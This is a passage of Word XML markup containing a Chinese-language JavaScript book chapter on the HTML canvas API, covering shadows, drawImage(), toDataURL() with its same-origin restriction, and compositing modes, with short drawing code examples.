      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeRect(100,100,300,200);//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个矩形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.font="Bold 36pt Helvetica";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillText</w:t>
      </w:r>
      <w:r>
        <w:t>("Hello World",115,225);//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一些文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个模糊点的阴影。较大的偏移量使绘制的物体浮得越高</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要注意透明的阴影是如何和蓝色的方框重叠的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.shadowOffsetX=c.shadowOffsetY=20;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.shadowBlur=10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle="red";//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个纯红色的矩形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillRect(50,25,200,65);//</w:t>
      </w:r>
      <w:r>
        <w:t>该红色矩形浮在蓝色方框上面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shadowOffsetX</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>shadowOffsetY</w:t>
      </w:r>
      <w:r>
        <w:t>属性总是在默认的坐标空间中度量的，它不受</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的影响。比如，假设先将坐标系旋转</w:t>
      </w:r>
      <w:r>
        <w:t>90°</w:t>
      </w:r>
      <w:r>
        <w:t>之后绘制了一些竖直的文本，之后再恢复到原先的坐标系统再绘制一些水平的文本。这样，竖直的文本和水</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>平的文本的阴影都是朝向一个方向的，这或许也正是想要的效果。同样地，通过不同的缩放变换绘制的图形拥有的阴影都有相同的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>高度</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="542" w:name="21_4_12_Tu_Pian_"/>
      <w:r>
        <w:t>21.4.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　图片</w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了矢量图形（路径、线段等）之外，画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还支持位图图片。</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>用于将</w:t>
      </w:r>
      <w:r>
        <w:t>源图片（或者源图片中的矩形区域中）的像素内容复制到画布上，有需要的时候可以对图片进行缩放和旋转。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候可以传递</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个、</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个或者</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>个参数。其中第一个参数是要将其像素复制到画布上的源图片。这个图片参数通常是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或者通过</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建的一张屏幕外图片，但是它还可以是另一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或者甚至是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。如果指定的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素正在加载数据，那么调用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法什么也不做。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果传递</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个参数给</w:t>
      </w:r>
      <w:r>
        <w:t>drawIma</w:t>
      </w:r>
      <w:r>
        <w:t>ge()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么第二个和第三个参数指定待绘制图片的左上角位置的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标。以这种方式调用的话，源图片的所有内容都会复制到画布上。指定的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标会相应地转换到当前的坐标系中，如果有需要的话可以对图片进行缩放和旋转。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果传递</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个参数给</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么另外两个参数分别是宽度和高度。</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标以及宽度和高度，这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数在画布上定义了一个目标矩形局域。图片的左上角定位在点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>，而其右下角则定位在点</w:t>
      </w:r>
      <w:r>
        <w:t>(x+width,y+height)</w:t>
      </w:r>
      <w:r>
        <w:t>。同样，这种调用方式也会复制整个源图片。该目标</w:t>
      </w:r>
      <w:r>
        <w:t>矩形区域会在当前坐标系中度量，而即使不指定缩放变换源图片也会自动伸缩适应目标矩形区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果传递</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>个参数给</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么这些参数还同时指定了一个源矩形区域和一个目标矩形区域，并且只会复制源矩形区域内的像素。其中第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个参数指定了源矩形区域。它们是以</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素来度量的。如果指定的源图片是另一个画布，那么源矩形区域会使用该画布的默认坐标系，并会忽略指定的任何变换。第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>个参数指定了图片要绘制在的目标矩形区域，该区域是在画布当前的坐标系而不是默认的坐标系中绘制的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-9</w:t>
      </w:r>
      <w:r>
        <w:t>是一个使用</w:t>
      </w:r>
      <w:r>
        <w:t>dra</w:t>
      </w:r>
      <w:r>
        <w:t>wImage()</w:t>
      </w:r>
      <w:r>
        <w:t>的简单例子。它使用</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>个参数来调用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，从一个画布部分区域中复制像素并将它们绘制出来，同时在同相同画布上进行放大和旋转。正如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-15</w:t>
      </w:r>
      <w:r>
        <w:t>所示的那样，为了明显看出像素化，已经将图片放到了足够大，这时候可以看出其中使用了半透明像素来使得线条边缘变得更加平滑。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4050101" cy="1052422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="77" name="00077.jpeg" descr="000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7.jpeg" descr="00077.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4050101" cy="1052422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>将像素放大</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-9</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在左上角绘制一条线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(5,5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(45,45);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineWidth=8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineCap="round";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.translate(50,100);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.rotate(-45*Math.PI/180);//</w:t>
      </w:r>
      <w:r>
        <w:t>让线段变得更直</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.scale(10,10);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它放大到能够看到每个像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来复制该线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.drawImage(c.canvas,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0,0,50,50,//</w:t>
      </w:r>
      <w:r>
        <w:t>源矩形区域：未变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0,0,50,50);//</w:t>
      </w:r>
      <w:r>
        <w:t>目标矩形区域：变换过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了能将一张图片绘制到一张画布中之外，还能</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将画布中内容抽取成一张图片。和这里介绍的其他方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是画布元素自身的方法，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法。通常调用</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候不传递任何参数，它会将画布内容以</w:t>
      </w:r>
      <w:r>
        <w:t>PNG</w:t>
      </w:r>
      <w:r>
        <w:t>图片的形式返回，同时编码成一个字符串数据，用</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>表示。返回的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>可以在＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中使用，同时也可以使用如下代码来实现画布静态截图功能：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var img=document.createElement("img");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.src=canvas.toDataURL();//</w:t>
      </w:r>
      <w:r>
        <w:t>设置其</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>document.body.appendChild(img);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它追加到文档后面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有浏览器都要求支持</w:t>
      </w:r>
      <w:r>
        <w:t>PNG</w:t>
      </w:r>
      <w:r>
        <w:t>图片格式。其中有些浏览器可能还支持其他的图片格式，可以通过利用</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第一个可选参数来指定需要图片格式的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。想要了解详细内容，可以参见第四部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候，必须要知道它有一个很重要的安全限制。为了避免跨域的信息泄露，</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法无法在</w:t>
      </w:r>
      <w:r>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:t>"origin-clean"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上使用的。这里所谓的非</w:t>
      </w:r>
      <w:r>
        <w:t>"orign-clean"</w:t>
      </w:r>
      <w:r>
        <w:t>指的是：一张画布上绘制的图片（直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制或者间接通过</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>绘制）和画布所在的文档不属于同源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="543" w:name="21_4_13_He_Cheng_"/>
      <w:r>
        <w:t>21.4.13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　合成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当勾勒线段、填充区域或者复制图片的时候，会想要让新绘制的像素点能够在画布中原有像素的上面。如果绘制一个不透明的像素，它们会替换同一位置原有的像素。如果绘制的是半透明的像素，那么新（</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）像素会和原（</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>目标</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）像素进行合并，原像素可以透过新像素看到</w:t>
      </w:r>
      <w:r>
        <w:t>，而清晰程度取决于像素的透明度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>合并新的半透明源像素和已有目标像素的过程称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>合成</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，上面描述的合成过程也是画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义的默认像素合并方式。但是，有的时候其实是不希望进行合成的。比如，已经使用半透明像素在画布中绘制了一些内容，这个时候想要进行临时切换，然后再恢复到原先的状态。这个时候最简单的方法就是：将使用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将画布内容（或者画布一部分区域内容）复制到一张屏幕外画布中。然后，在需要恢复画布的时候，再从屏幕外画布中将内容复制回到屏幕上的画布中。但是，要记住的是，保存的像素都是半透明。</w:t>
      </w:r>
      <w:r>
        <w:t>如果这个时候合成是开启的，它们并不会完全抹除临时绘制的内容。因此，在上述情况下，就需要一种方式将合成关闭：不论源像素是否透明，都绘制源像素并忽略目标像素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要指定合成的方式，可以设置</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompositeOperation</w:t>
      </w:r>
      <w:r>
        <w:t>属性。该属性的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"source-over"</w:t>
      </w:r>
      <w:r>
        <w:t>，表示将源像素绘制在目标像素上，对于半透明的源像素就直接合并。如果将该属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>，则表示关闭合成：源像素将原封不动地复制到画布上，直接忽略目标像素。</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompositeOperation</w:t>
      </w:r>
      <w:r>
        <w:t>属性还有另一个有时相当有用</w:t>
      </w:r>
      <w:r>
        <w:t>的属性值</w:t>
      </w:r>
      <w:r>
        <w:t>——"destination-over"</w:t>
      </w:r>
      <w:r>
        <w:t>，表示将新的源像素绘制在已有目标像素的下面。如果目标像素是半透明或者透明的话，所有或者部分源像素的颜色在最终颜色上就是可见的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"source-over"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"destination-over"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>是三种最常用的合成类型，而事实上画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompositeOperation</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>个值。直接看这些属性值的名字就大概知道它们是怎样的合成方式了，当然，也可以结合一些实际的例子来理解它们的工作原理，不过这个过程可能会比较漫长。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-16</w:t>
      </w:r>
      <w:r>
        <w:t>展示了这</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
